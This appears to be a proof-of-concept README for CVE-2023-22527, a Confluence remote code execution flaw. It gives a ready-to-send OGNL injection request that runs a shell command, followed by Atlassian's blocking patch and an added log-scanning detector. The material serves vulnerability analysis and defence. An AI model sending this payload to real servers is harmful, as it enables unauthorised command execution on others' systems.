
CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC


djerryz/CVE-2023-22527_Confluence_RCE

 
 


CVE-2023-22527 Confluence RCE

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC

References

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server | Atlassian Support | Atlassian Documentation

[CONFSERVER-93833] RCE (Remote Code Execution) in Confluence Data Center and Server - CVE-2023-22527 - Create and track feature requests for Atlassian products.

https://twitter.com/TheDFIRReport/status/1749066611678466205

Diff

[Image: image-20240117093518010]

PoC

POST http://192.168.80.139:8090/template/aui/text-inline.vm HTTP/1.1
Host: 192.168.80.139:8090
Content-Length: 372
Content-Type: application/x-www-form-urlencoded
Connection: close

label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29

Keyword

Velocity

Patch

package com.atlassian.confluence.impl.struts;

import java.util.Set;
import ognl.Node;
import org.apache.struts2.ognl.StrutsOgnlGuard;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class ConfluenceOgnlGuard extends StrutsOgnlGuard {
    private static final Logger LOG = LoggerFactory.getLogger(ConfluenceOgnlGuard.class);
    private static final Set<String> BLOCKED_VAR_REFS = Set.of("#context", "#request", "#parameters", "#session", "#application", "#attr");

    public ConfluenceOgnlGuard() {
    }

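    // Returns false so the tree check is never skipped.
    protected boolean skipTreeCheck(Node tree) {
        return false;
    }

    // A node is blocked if the parent Struts guard blocks it or if it is a blocked variable reference.
    protected boolean checkNode(Node node) {
        return super.checkNode(node) || this.isBlockedVarRef(node);
    }

    // Matches ognl.ASTVarRef nodes whose text is in BLOCKED_VAR_REFS.
    protected boolean isBlockedVarRef(Node node) {
        String nodeClassName = node.getClass().getName();
        if ("ognl.ASTVarRef".equals(nodeClassName)) {
            String varRefValue = node.toString();
            if (BLOCKED_VAR_REFS.contains(varRefValue)) {
                // "#attr" is blocked like the others, but without a log warning.
                if (!"#attr".equals(varRefValue)) {
                    LOG.warn("Expression contains blocked var ref [{}]", varRefValue);
                }

                return true;
            }
        }

        return false;
    }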
}
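
A log-side counterpart to the guard above, as an added example that is not part of this repository or of Atlassian's code: it decodes a form body the way the PoC request encodes it (URL encoding plus `\uXXXX` escapes) and reports the parameters whose values reference a name from `BLOCKED_VAR_REFS`. It is a text-level heuristic, not the AST check the patch performs; the function names, the `/example/form` path and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Same names as BLOCKED_VAR_REFS in the ConfluenceOgnlGuard class above.
BLOCKED_VAR_REFS = {"#context", "#request", "#parameters",
                    "#session", "#application", "#attr"}

_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")
# Whole identifier after '#', so "#attribute" is not mistaken for "#attr".
_VAR_REF = re.compile(r"#[A-Za-z_$][A-Za-z0-9_$]*")


def normalise(value):
    """Resolve \\uXXXX escapes (the PoC body uses \\u0027 for a quote)."""
    return _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)


def blocked_refs_in_body(body):
    """Map each form parameter to the blocked var refs found in its value."""
    hits = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        found = set(_VAR_REF.findall(normalise(value))) & BLOCKED_VAR_REFS
        if found:
            hits.setdefault(name, set()).update(found)
    return hits


def scan(requests):
    """Yield (method, path, hits) for every request whose body matches."""
    for method, path, body in requests:
        hits = blocked_refs_in_body(body)
        if hits:
            yield method, path, hits


# Constructed sample requests (method, path, form body); not real traffic.
SAMPLE_REQUESTS = [
    ("POST", "/template/aui/text-inline.vm", "label=release+notes"),
    ("POST", "/template/aui/text-inline.vm",
     "label=%23request.get%28%5Cu0027k%5Cu0027%29"),
    ("POST", "/template/aui/text-inline.vm",
     "label=a&q=%5Cu0023parameters.q%5B0%5D"),
    ("POST", "/example/form", "text=%23attribute+%23sessions"),
]

if __name__ == "__main__":
    for method, path, hits in scan(SAMPLE_REQUESTS):
        print(method, path, {k: sorted(v) for k, v in hits.items()})
```
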
